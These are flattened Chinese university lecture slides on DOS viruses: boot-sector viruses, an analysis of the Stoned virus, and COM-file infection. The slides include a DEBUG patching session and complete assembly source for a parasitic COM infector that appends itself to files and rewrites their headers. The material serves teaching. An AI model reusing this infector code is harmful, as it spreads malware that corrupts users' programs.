4-DOS病毒分析

1,计算机病毒 Computer Virus,傅建明 Fujms； fujms,武汉大学计算机学院,2,第四章 DOS病毒分析,4.1引导区病毒 4.2文件型病毒 4.3混合病毒,3,4.1 引导区病毒,引导区病毒是指专门感染磁盘引导扇区和硬盘主引导扇区的计算机病毒程序. 引导型病毒是一种在ROM BIOS之后，系统引导时出现的病毒，它先于操作系统，依托的环境是BIOS中断服务程序。,4,4.1 引导区病毒,引导型病毒按其寄生对象的不同又可分为两类，即MBR（主引导区）病毒、BR（引导区）病毒。 MBR病毒也称为分区病毒，将病毒寄生在硬盘分区主引导程序所占据的硬盘0面0道1扇区中。典型的病毒有大麻(Stoned)、2708、INT60病毒等。 BR 病毒是将病毒寄生在硬盘逻辑0扇或软盘逻辑0扇（即0面0道第1个扇区）。典型的病毒有Brain、小球病毒等。,5,4.1 引导区病毒,引导型病毒的主要特点为： 1、引导型病毒是在安装操作系统之前进入内存，寄生对象又相对固定，因此该类型病毒基本上不得不采用减少操作系统所掌管的内存容量方法来驻留内存高端。 2、引导型病毒需要把病毒传染给软盘，一般是通过修改INT 13H的中断向量，而新INT 13H中断向量段址必定指向内存高端的病毒程序。,6,4.1 引导区病毒,3、引导型病毒感染硬盘时，必定驻留硬盘的主引导扇区或引导扇区，并且只驻留一次，因此引导型病毒一般都是在软盘启动过程中把病毒传染给硬盘的。 4、引导型病毒的寄生对象相对固定，把当前的系统主引导扇区和引导扇区与干净的主引导扇区和引导扇区进行比较，如果内容不一致，可认定系统引导区异常。,7,8,大麻病毒分析,“大麻”病毒又名“石头”病毒，英文名称分别为MarIJUANA和Stone，属于系统型的恶性病毒。它专门感染软盘引导扇区和硬盘主引导扇区，破坏软盘的文件目录表和硬盘的文件分配表，从而造成磁盘文件的大量丢失，甚至于导致硬盘无法启动。如果感染了“大麻”病毒的系统盘启动系统，当满足发作条件时，往往出现以下提示信息： Your PC is now Stoned! LEGALISE MARIJUANA!,9,大麻病毒分析,大麻病毒很短小,仅1B8H字节的代码就完成了驻留内存、修改中断向量、区别软硬盘、感染软盘、感染硬盘、引导原硬盘主引导扇区、显示时机判断、显示信息以及大麻病毒感染标志判断以防止重复感染等众多功能。,10,大麻病毒分析,对于软盘来说，病毒程序占用磁盘的引导扇区，而将系统原引导扇区转移到l面0道3扇区，这一物理扇区对于360KB的软盘来说，属于软盘根目录区的最后一个扇区(逻辑0BH扇区)。 对于硬盘来说，病毒程序侵占了硬盘的主引导扇区，而将原主引导扇区的内容转移到0柱0面7扇区。 在内存中,大麻病毒占用了2KB内存,实际只占用了1KB。,11,大麻病毒分析,一个被感染“大麻”病毒的磁盘引导扇区，一般有下列特征： (1)扇区开始的指令代码为：“EA0500C0”。 (2)从扇区的18AH偏移地址开始有字符串：“Your PC is now Stoned!。,12,13,14,大麻病毒分析,实施表现的条件是，当从A驱动器启动系统时，时钟计数是8的整数倍，则显示下列提示信息： Your PC is now Stoned! LEGALLISE MARIJUANA!,15,4.2文件型病毒,我们把所有通过操作系统的文件系统进行感染的病毒都称作文件病毒，所以这是一类数目非常巨大的病毒。理论上可以制造这样一个病毒，该病毒可以感染基本上所有操作系统的可执行文件。目前已经存在这样的文件病毒,它们可以感染所有标准的DOS可执行文件，包括批处理文件、DOS下的可加载驱动程序（.SYS）文件以及普通的COMEXE可执行文件。,16,COM文件型病毒,COM文件中的程序代码只在一个段内运行，文件长度不超过64K字节，其结构比较简单。由于COM文件与EXE文件在结构上的不同，它们在调入执行时也有很大差别。COM文件在调入时，DOS将全部可用内存分配给用户程序。四个寄存器DS(DataSegment数据段)，CS(Code Segment代码段)，SS(Stack Segment堆栈段)和ES (Extra Segment附加段)全部指向程序段前缀(PSP，由DoS建立，是DoS、用户程序及命令行之间的接口)的段地址。指令指针ip置为0100h,从程序的第一条指令开始执行；栈指针SP置为程序段的末尾。,17,COM文件型病毒,18,COM文件型病毒,19,C:debug -u 0CA4:0100 B8371E MOV AX,1E37 ;注意前三个字节的内容 0CA4:0103 BA3008 MOV DX,0830 0CA4:0106 3BC4 CMP AX,SP 0CA4:0108 7369 JNB 0173 0CA4:010A 8BC4 MOV AX,SP 0CA4:010C 2D4403 SUB AX,0344 0CA4:010F 90 NOP 0CA4:0110 25F0FF AND AX,FFF0 0CA4:0113 8BF8 MOV DI,AX 0CA4:0115 B9A200 MOV CX,00A2 0CA4:0118 90 NOP 0CA4:0119 BE7E01 MOV SI,017E 0CA4:011C FC CLD 0CA4:011D F3 REPZ 0CA4:011E A5 MOVSW 0CA4:011F 8BD8 MOV BX,AX,20,-a af1 0CA4:0AF1 mov ah,0 0CA4:0AF3 int 16 ;等待按键 0CA4:0AF5 cmp al,1b ;等待ESC键 0CA4:0AF7 jnz af1 0CA4:0AF9 mov word ptr 100,37b8 ;恢复程序开始的三个字节 0CA4:0AFF mov byte ptr 102,1e 0CA4:0B04 push cs ；进栈CS:100 0CA4:0B05 mov si,100 0CA4:0B08 push si 0CA4:0B09 retf ;RetF回到CS:100，程序开始处 0CA4:0B0A -a 100 0CA4:0100 jmp af1 ；将程序开头改成跳转到修改的模块 0CA4:0103 -rcx CX 09F1 ：a0a -w /Writing 00A0A bytes,21,COM文件型病毒,文件型病毒为了完成它的感染，首先需要查找目标文件，然后对目标文件进行读写操作。这些操作都需要用到系统文件目录管理功能调用（INT 21H）,22,COM文件型病毒,1） INT 21H 子功能 3DH 打开文件 2） INT 21H 子功能 3EH 关闭文件 3） INT 21H 子功能 3FH 读文件或设备 4） INT 21H 子功能 40H 写文件或设备 5） INT 21H 子功能 42H 移动文件指针 6） INT 21H 子功能 4EH 查找第一个匹配文件 7） INT 21H 子功能 4FH 查找下一个匹配文件 8） INT 21H 子功能 1AH 设置磁盘传送缓冲区(DTA),23,COM文件型病毒-基本原理,内存驻留的病毒首先检查系统可用内存，查看内存中是否已经有病毒代码存在，如果没有将病毒代码装入内存中。非内存驻留病毒会在这个时候进行感染，查找当前目录、根目录或者环境变量PATH中包含的目录，发现可以被感染的可执行文件就进行感染。 (2) 执行病毒的一些其他功能，比如说破坏功能，显示信息或者病毒精心制作的动画等等，对于驻留内存的病毒来说，执行这些功能的时间可以是开始执行的时候，也可以是满足某个条件的时候，比如说定时或者当天的日期是13号恰好又是星期五等等。为了实现这种定时的发作，病毒往往会修改系统的时钟中断，以便在合适的时候激活。,24,COM文件型病毒-基本原理,(3) 完成这些工作之后，将控制权交回被感染的程序。为了保证原来程序的正确执行，寄生病毒在执行被感染程序的之前，会把原来的程序还原，伴随病毒会直接调用原来的程序，覆盖病毒和其他一些破坏性感染的病毒会把控制权交回DOS操作系统。 (4) 对于内存驻留病毒来说，驻留时会把一些DOS或者基本输入输出系统（BIOS）的中断指向病毒代码，比如说INT13H或者INT 21H，这样系统执行正常的文件磁盘操作的时候，就会调用病毒驻留在内存中的代码，进行进一步的破坏或者感染。,25,CSEG SEGMENT ASSUME CS:CSEG,DS:CSEG,SS:CSEG main PROC NEAR mainstart: CALL vstart ;病毒的代码开始处 vstart: POP SI ;得到当前地址 (经典技术!) MOV BP,SI ;保存当前地址 ADD SI,OFFSET yuan4byte-OFFSET vstart ;取得原程序中的前四个字节 MOV DI,100h ;目的地址 MOV AX,DS:SI ;开始复制 MOV DS:DI,AX INC SI INC SI INC DI ;将yuan4byte处的4字节复制到100处 INC DI MOV AX,DS:SI MOV DS:DI,AX,26,MOV SI,BP ;恢复地址值,将文件的头4个字节读入到yuan4byte处 MOV DX,OFFSET filename-OFFSET vstart ;得到文件名 ADD DX,SI MOV AL,02 MOV AH,3dh ;以读写方式打开文件 INT 21h JC error MOV BX,AX ;文件句柄 MOV DX,OFFSET yuan4byte-OFFSET vstart ;读文件的前四个字节 ADD DX,SI MOV CX,4 MOV AH,3fh INT 21h ;读4个字节,27,MOV AX,4202h ;从文件尾倒移 XOR CX,CX XOR DX,DX INT 21h ;文件指针移到末尾,此时AX为新的文件指针位置 MOV DI,OFFSET new4byte-OFFSET vstart ;保存要跳的地方 ADD DI,2 ADD DI,SI SUB AX,4 ; MOV DS:DI,AX ;将文件指针位置保存到new4byte + 2处 ADD SI,OFFSET mainstart-OFFSET vstart ;准备写入病毒 MOV DX,SI ;将从vstart处开始的代码写入文件 MOV vsizes,OFFSET vends-OFFSET mainstart MOV CX,vsizes MOV AH,40h ;写文件，写到文件末尾 INT 21h,28,MOV SI,BP ;定位到文件头 MOV AL,0 XOR CX,CX XOR DX,DX MOV AH,42h INT 21h ;文件指针移到开头 MOV AH,40h ;将新的文件头写入 MOV CX,4 MOV DX,OFFSET new4byte-OFFSET vstart ADD DX,SI INT 21h ;将new4byte处4字节内容写入文件开始处 ;即将文件开头设置一条jmp指令，跳到病毒开始处 MOV AH,3eh ;关闭文件 INT 21h,29,error: MOV AX,100h PUSH AX RET main ENDP yuan4byte: RET DB 3 DUP (?) vsizes DW 0 new4byte DB M,0e9h,0,0 ;dec bp, jmp xxxx filename DB “,0 ;parasited file name vends: start: MOV AX,CSEG MOV DS,AX MOV SS,AX CALL main MOV AX,4c00h INT 21h CSEG ENDS END start,30,程序说明,从两个视角读程序： 1、病毒母体程序：具备完全的功能 母体自身的执行，寻找感染，自身退出。 2、携带病毒的程序：基本功能 寻找感染,31,程序说明,1、病毒母体程序： 不存在恢复100h的4个字节，打开，读取其前4个字节保存到yuan4byte，计算跳转指令保存到new4byte，复制自身尾端，用new4byte 的内容改写的首部4个字节。 2、携带病毒的程序：基本功能 从yuan4byte处恢复100h的4个字节，打开，读取其前4个字节保存到yuan4byte，计算跳转指令保存到new4byte，复制自身尾端，用new4byte 的内容改写的首部4个字节。,32,4.3混合病毒,混合病毒是指那些即可以对引导区进行感染也可以对文件进行感染的病毒。但是这类病毒绝对不是引导区病毒和文件型病毒的简单相加。 引导区病毒是在引导DOS系统之前，它根本就无法用到文件系统中断调用21H，